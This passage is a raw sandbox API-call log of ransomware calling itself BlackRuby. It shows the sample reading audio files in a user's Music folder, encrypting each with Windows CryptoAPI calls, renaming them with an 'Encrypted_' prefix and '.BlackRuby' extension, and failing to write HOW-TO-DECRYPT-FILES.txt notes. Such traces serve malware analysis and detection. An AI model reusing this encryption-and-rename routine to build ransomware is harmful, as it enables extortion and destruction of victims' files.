lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_4cPtjPVVJriBf7sY8yAKSfvHfUxX1Nztp7eG.BlackRuby", lpFilePart=0x0) returned 0x4f [0060.012] GetLastError () returned 0xb7 [0060.012] SetErrorMode (uMode=0x1) returned 0x0 [0060.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e89e3b0, ftCreationTime.dwHighDateTime=0x1d34ecf, ftLastAccessTime.dwLowDateTime=0x30da70e0, ftLastAccessTime.dwHighDateTime=0x1d35344, ftLastWriteTime.dwLowDateTime=0x2bf619a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x9e70)) returned 1 [0060.012] GetLastError () returned 0xb7 [0060.012] SetErrorMode (uMode=0x0) returned 0x1 [0060.012] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_4cPtjPVVJriBf7sY8yAKSfvHfUxX1Nztp7eG.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_4cptjpvvjribf7sy8yaksfvhfuxx1nztp7eg.blackruby")) returned 1 [0060.012] GetLastError () returned 0xb7 [0060.012] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.012] GetLastError () returned 0xb7 [0060.012] SetErrorMode (uMode=0x1) returned 0x0 [0060.012] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.013] GetLastError () returned 0x5 [0060.014] SetErrorMode (uMode=0x0) returned 0x1 [0060.014] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.014] GetLastError () returned 0x5 [0060.014] SetErrorMode (uMode=0x1) returned 0x0 [0060.014] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), fInfoLevelId=0x0, lpFileInformation=0x1bc21a4 | out: lpFileInformation=0x1bc21a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47328c60, ftCreationTime.dwHighDateTime=0x1d3581c, ftLastAccessTime.dwLowDateTime=0xc0cc5c80, ftLastAccessTime.dwHighDateTime=0x1d34e13, ftLastWriteTime.dwLowDateTime=0xc0cc5c80, ftLastWriteTime.dwHighDateTime=0x1d34e13, nFileSizeHigh=0x0, nFileSizeLow=0x670b)) returned 1 [0060.014] GetLastError () returned 0x5 [0060.014] SetErrorMode (uMode=0x0) returned 0x1 [0060.014] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.014] GetLastError () returned 0x5 [0060.014] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.014] GetLastError () returned 0x5 [0060.014] SetErrorMode (uMode=0x1) returned 0x0 [0060.014] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.014] GetLastError () returned 0x0 [0060.014] GetFileType (hFile=0x184) returned 0x1 [0060.015] SetErrorMode (uMode=0x0) returned 0x1 [0060.015] GetFileType (hFile=0x184) returned 0x1 [0060.015] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x670b [0060.015] GetLastError () returned 0x0 [0060.015] ReadFile (in: hFile=0x184, lpBuffer=0x1bc40b0, nNumberOfBytesToRead=0x670b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bc40b0*, lpNumberOfBytesRead=0x18ed84*=0x670b, lpOverlapped=0x0) returned 1 [0060.015] GetLastError () returned 0x0 [0060.015] CloseHandle (hObject=0x184) returned 1 [0060.016] GetLastError () returned 0x0 [0060.016] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.016] GetLastError () returned 0x0 [0060.016] SetErrorMode (uMode=0x1) returned 0x0 [0060.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47328c60, ftCreationTime.dwHighDateTime=0x1d3581c, ftLastAccessTime.dwLowDateTime=0xc0cc5c80, ftLastAccessTime.dwHighDateTime=0x1d34e13, ftLastWriteTime.dwLowDateTime=0xc0cc5c80, ftLastWriteTime.dwHighDateTime=0x1d34e13, nFileSizeHigh=0x0, nFileSizeLow=0x670b)) returned 1 [0060.016] GetLastError () returned 0x0 [0060.016] SetErrorMode (uMode=0x0) returned 0x1 [0060.016] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0060.016] GetLastError () returned 0x0 [0060.051] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c2b250, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b60) returned 1 [0060.051] GetLastError () returned 0x0 [0060.051] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.051] GetLastError () returned 0x0 [0060.056] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0060.056] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c5829c*=0x1, dwFlags=0x0) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c58268, dwFlags=0x0) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c582e4*, pdwDataLen=0x18ed74*=0x6800, dwBufLen=0x6800 | out: pbData=0x1c582e4*, pdwDataLen=0x18ed74*=0x6800) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c65310*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c65310*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c65340*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c65340*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.056] GetLastError () returned 0x0 [0060.056] CryptDestroyKey (hKey=0x360b60) returned 1 [0060.056] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.056] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.056] GetLastError () returned 0x0 [0060.056] SetErrorMode (uMode=0x1) returned 0x0 [0060.056] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.057] GetLastError () returned 0xb7 [0060.057] GetFileType (hFile=0x184) returned 0x1 [0060.057] SetErrorMode (uMode=0x0) returned 0x1 [0060.057] GetFileType (hFile=0x184) returned 0x1 [0060.059] CloseHandle (hObject=0x184) returned 1 [0060.059] GetLastError () returned 0xb7 [0060.059] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav", lpFilePart=0x0) returned 0x20 [0060.059] GetLastError () returned 0xb7 [0060.059] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_qTR7oT6KdUPU81EJFFNazbLstt6WriNn1VgCLjBRfW0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_qTR7oT6KdUPU81EJFFNazbLstt6WriNn1VgCLjBRfW0.BlackRuby", lpFilePart=0x0) returned 0x56 [0060.059] GetLastError () returned 0xb7 [0060.059] SetErrorMode (uMode=0x1) returned 0x0 [0060.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47328c60, ftCreationTime.dwHighDateTime=0x1d3581c, ftLastAccessTime.dwLowDateTime=0xc0cc5c80, ftLastAccessTime.dwHighDateTime=0x1d34e13, ftLastWriteTime.dwLowDateTime=0x2bfd3dc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6810)) returned 1 [0060.059] GetLastError () returned 0xb7 [0060.059] SetErrorMode (uMode=0x0) returned 0x1 [0060.059] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\cv2nl.wav" (normalized: "c:\\users\\eebsym5\\music\\cv2nl.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_qTR7oT6KdUPU81EJFFNazbLstt6WriNn1VgCLjBRfW0.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_qtr7ot6kdupu81ejffnazblstt6wrinn1vgcljbrfw0.blackruby")) returned 1 [0060.059] GetLastError () returned 0xb7 [0060.059] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.060] GetLastError () returned 0xb7 [0060.060] SetErrorMode (uMode=0x1) returned 0x0 [0060.060] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.060] GetLastError () returned 0x5 [0060.060] SetErrorMode (uMode=0x0) returned 0x1 [0060.061] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\desktop.ini", lpFilePart=0x0) returned 0x22 [0060.061] GetLastError () returned 0x5 [0060.061] SetErrorMode (uMode=0x1) returned 0x0 [0060.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\desktop.ini" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c95c08 | out: lpFileInformation=0x1c95c08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0060.061] GetLastError () returned 0x5 [0060.061] SetErrorMode (uMode=0x0) returned 0x1 [0060.061] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.061] GetLastError () returned 0x5 [0060.061] SetErrorMode (uMode=0x1) returned 0x0 [0060.061] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.061] GetLastError () returned 0x5 [0060.062] SetErrorMode (uMode=0x0) returned 0x1 [0060.062] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.062] GetLastError () returned 0x5 [0060.062] SetErrorMode (uMode=0x1) returned 0x0 [0060.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1cb3888 | out: lpFileInformation=0x1cb3888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ced8500, ftCreationTime.dwHighDateTime=0x1d35157, ftLastAccessTime.dwLowDateTime=0xd4977af0, ftLastAccessTime.dwHighDateTime=0x1d34a2c, ftLastWriteTime.dwLowDateTime=0xd4977af0, ftLastWriteTime.dwHighDateTime=0x1d34a2c, nFileSizeHigh=0x0, nFileSizeLow=0x221d)) returned 1 [0060.062] GetLastError () returned 0x5 [0060.062] SetErrorMode (uMode=0x0) returned 0x1 [0060.063] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.063] GetLastError () returned 0x5 [0060.063] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.063] GetLastError () returned 0x5 [0060.063] SetErrorMode (uMode=0x1) returned 0x0 [0060.063] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.063] GetLastError () returned 0x0 [0060.063] GetFileType (hFile=0x184) returned 0x1 [0060.063] SetErrorMode (uMode=0x0) returned 0x1 [0060.063] GetFileType (hFile=0x184) returned 0x1 [0060.063] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x221d [0060.063] GetLastError () returned 0x0 [0060.063] ReadFile (in: hFile=0x184, lpBuffer=0x1cb568c, nNumberOfBytesToRead=0x221d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cb568c*, lpNumberOfBytesRead=0x18ed84*=0x221d, lpOverlapped=0x0) returned 1 [0060.064] GetLastError () returned 0x0 [0060.064] CloseHandle (hObject=0x184) returned 1 [0060.064] GetLastError () returned 0x0 [0060.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.064] GetLastError () returned 0x0 [0060.064] SetErrorMode (uMode=0x1) returned 0x0 [0060.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ced8500, ftCreationTime.dwHighDateTime=0x1d35157, ftLastAccessTime.dwLowDateTime=0xd4977af0, ftLastAccessTime.dwHighDateTime=0x1d34a2c, ftLastWriteTime.dwLowDateTime=0xd4977af0, ftLastWriteTime.dwHighDateTime=0x1d34a2c, nFileSizeHigh=0x0, nFileSizeLow=0x221d)) returned 1 [0060.064] GetLastError () returned 0x0 [0060.064] SetErrorMode (uMode=0x0) returned 0x1 [0060.074] CryptImportKey (in: hProv=0x37c680, pbData=0x1d13e84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0060.074] GetLastError () returned 0x0 [0060.074] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.074] GetLastError () returned 0x0 [0060.105] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0060.105] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1b5788c*=0x1, dwFlags=0x0) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1b57858, dwFlags=0x0) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b578d4*, pdwDataLen=0x18ed74*=0x2310, dwBufLen=0x2310 | out: pbData=0x1b578d4*, pdwDataLen=0x18ed74*=0x2310) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5bf20*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b5bf20*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b5bf50*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b5bf50*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.105] GetLastError () returned 0x0 [0060.106] CryptDestroyKey (hKey=0x360ee0) returned 1 [0060.106] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.106] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.106] GetLastError () returned 0x0 [0060.106] SetErrorMode (uMode=0x1) returned 0x0 [0060.106] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.107] GetLastError () returned 0xb7 [0060.107] GetFileType (hFile=0x184) returned 0x1 [0060.107] SetErrorMode (uMode=0x0) returned 0x1 [0060.107] GetFileType (hFile=0x184) returned 0x1 [0060.107] CloseHandle (hObject=0x184) returned 1 [0060.108] GetLastError () returned 0xb7 [0060.108] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3", lpFilePart=0x0) returned 0x2b [0060.108] GetLastError () returned 0xb7 [0060.108] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_LcGs16A2bNK84CxemUBhHNQOTRaDuhUIAZgIhbJkSqL.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_LcGs16A2bNK84CxemUBhHNQOTRaDuhUIAZgIhbJkSqL.BlackRuby", lpFilePart=0x0) returned 0x56 [0060.108] GetLastError () returned 0xb7 [0060.108] SetErrorMode (uMode=0x1) returned 0x0 [0060.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ced8500, ftCreationTime.dwHighDateTime=0x1d35157, ftLastAccessTime.dwLowDateTime=0xd4977af0, ftLastAccessTime.dwHighDateTime=0x1d34a2c, ftLastWriteTime.dwLowDateTime=0x2c0461e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2320)) returned 1 [0060.108] GetLastError () returned 0xb7 [0060.108] SetErrorMode (uMode=0x0) returned 0x1 [0060.108] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\elFcf7nCxGeIv19T.mp3" (normalized: "c:\\users\\eebsym5\\music\\elfcf7ncxgeiv19t.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_LcGs16A2bNK84CxemUBhHNQOTRaDuhUIAZgIhbJkSqL.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_lcgs16a2bnk84cxemubhhnqotraduhuiazgihbjksql.blackruby")) returned 1 [0060.109] GetLastError () returned 0xb7 [0060.109] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.109] GetLastError () returned 0xb7 [0060.109] SetErrorMode (uMode=0x1) returned 0x0 [0060.109] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.109] GetLastError () returned 0x5 [0060.110] SetErrorMode (uMode=0x0) returned 0x1 [0060.110] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\ihuMjm-ajD-.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\ihuMjm-ajD-.m4a", lpFilePart=0x0) returned 0x26 [0060.110] GetLastError () returned 0x5 [0060.110] SetErrorMode (uMode=0x1) returned 0x0 [0060.111] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\ihuMjm-ajD-.m4a" (normalized: "c:\\users\\eebsym5\\music\\ihumjm-ajd-.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1b7f99c | out: lpFileInformation=0x1b7f99c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d655f60, ftCreationTime.dwHighDateTime=0x1d34f07, ftLastAccessTime.dwLowDateTime=0x5fcdc970, ftLastAccessTime.dwHighDateTime=0x1d35064, ftLastWriteTime.dwLowDateTime=0x5fcdc970, ftLastWriteTime.dwHighDateTime=0x1d35064, nFileSizeHigh=0x0, nFileSizeLow=0x12f89)) returned 1 [0060.111] GetLastError () returned 0x5 [0060.111] SetErrorMode (uMode=0x0) returned 0x1 [0060.111] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.111] GetLastError () returned 0x5 [0060.111] SetErrorMode (uMode=0x1) returned 0x0 [0060.111] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.111] GetLastError () returned 0x5 [0060.113] SetErrorMode (uMode=0x0) returned 0x1 [0060.113] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\iS-LxO16O7fX.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\iS-LxO16O7fX.m4a", lpFilePart=0x0) returned 0x27 [0060.113] GetLastError () returned 0x5 [0060.113] SetErrorMode (uMode=0x1) returned 0x0 [0060.113] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\iS-LxO16O7fX.m4a" (normalized: "c:\\users\\eebsym5\\music\\is-lxo16o7fx.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1b9d5b8 | out: lpFileInformation=0x1b9d5b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaae915d0, 